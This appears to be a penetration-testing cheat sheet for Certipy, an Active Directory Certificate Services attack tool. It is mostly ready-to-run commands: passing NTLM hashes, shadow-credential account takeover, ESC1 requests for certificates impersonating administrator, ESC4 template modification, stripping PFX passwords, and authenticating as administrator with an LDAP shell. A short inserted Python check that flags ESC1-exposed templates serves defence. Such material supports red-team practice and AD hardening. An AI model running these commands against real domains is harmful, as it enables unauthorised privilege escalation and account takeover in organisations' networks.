# certipy

#### Find Vulnerable Template

* Find vulnerable template

```bash
certipy find -u 'user' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -dc-ip 10.10.11.51
certipy find -u 'billy@foobar.com' -p <password> -dc-ip <DC_IP> -vulnerable -enabled
certipy find -u 'user@domain.local' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -dc-ip 10.10.11.51
```

#### Shadow Credential

* Get Shadow credentials

```bash
certipy-ad shadow auto -u 'user@domain.local' -p "WqSZAF6CysDQbGb3" -account 'user_2' -dc-ip '10.10.11.51' 
```

#### ESC1

* Exploit `ESC1`

```bash
certipy-ad req -u user -target domain.local -upn administrator@domain.local -ca sequel-DC01-CA -template template_name -hashes 3b181b914e7a9d5508ea1e20bc2b7fce:3b181b914e7a9d5508ea1e20bc2b7fce -key-size 4096  -dns 10.10.11.51 -dc-ip 10.10.11.51
```

```bash
certipy-ad req -u user -target domain.local -web -port 80 -subject 'DistinguishedName' -sid 'SID' -debug -ca sequel-DC01-CA -template template_name -target-ip <ip_ca>
```
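
For the defensive side of the `ESC1` request above, an added example (not part of the original page and not Certipy's own code) that checks a template's LDAP attributes for the conditions that let a requester choose the identity passed with `-upn`. The template names and values are constructed, and `enroll_principals` is a hypothetical, pre-resolved summary of the template's enrollment ACL.

```python
# Added example: which controls stop a requester from naming another identity?
ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # bit in msPKI-Certificate-Name-Flag
PEND_ALL_REQUESTS = 0x00000002          # bit in msPKI-Enrollment-Flag (manager approval)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Assumption: these groups count as "low-privileged" in this environment.
LOW_PRIV = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}


def esc1_mitigations(t):
    """Return the controls that block ESC1 on template t; an empty list means exposed."""
    blocks = []
    if not t["msPKI-Certificate-Name-Flag"] & ENROLLEE_SUPPLIES_SUBJECT:
        blocks.append("subject built from AD")
    if t["msPKI-Enrollment-Flag"] & PEND_ALL_REQUESTS:
        blocks.append("manager approval")
    if t["msPKI-RA-Signature"] > 0:
        blocks.append("authorized signature")
    ekus = set(t["pKIExtendedKeyUsage"])
    if ekus and not ekus & AUTH_EKUS:  # an empty EKU list is usable for any purpose
        blocks.append("no authentication EKU")
    if not LOW_PRIV & set(t["enroll_principals"]):  # hypothetical pre-resolved ACL field
        blocks.append("restricted enrollment")
    return blocks


# Constructed sample data, not taken from any real environment.
TEMPLATES = {
    "ExampleVpnUser": {
        "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enroll_principals": ["Domain Users"],
    },
    "ExampleWebServer": {
        "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x2,
        "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
        "enroll_principals": ["Domain Admins"],
    },
}

if __name__ == "__main__":
    for name, t in TEMPLATES.items():
        blocks = esc1_mitigations(t)
        print(name, "blocked by: " + ", ".join(blocks) if blocks else "EXPOSED to ESC1")
```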

#### ESC4

* Exploit `ESC4`

```bash
certipy template -username user@domain.local -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -template templateName -save-old
```

```bash
certipy template -username user@domain.local -p <password> -dc-ip ip_dc -template templateName -save-old -configuration configuration.json
```

#### Using PFXs without password

* Certipy's commands don't support password-protected PFX files. The following command can be used to "unprotect" a PFX file.

```bash
certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"
```

#### Auth using pfx

```bash
certipy auth -pfx administrator.pfx -domain domain.local
```

```bash
certipy auth -pfx administrator.pfx -domain domain.local -ldap-shell
```

#### Bloodhound

```bash
certipy find -u 'user@domain.local' -p 'Password123!' -dc-ip 10.129.205.199 -bloodhound
```

### Resources

* <https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate>
* <https://github.com/ly4k/Certipy/blob/main/README.md>
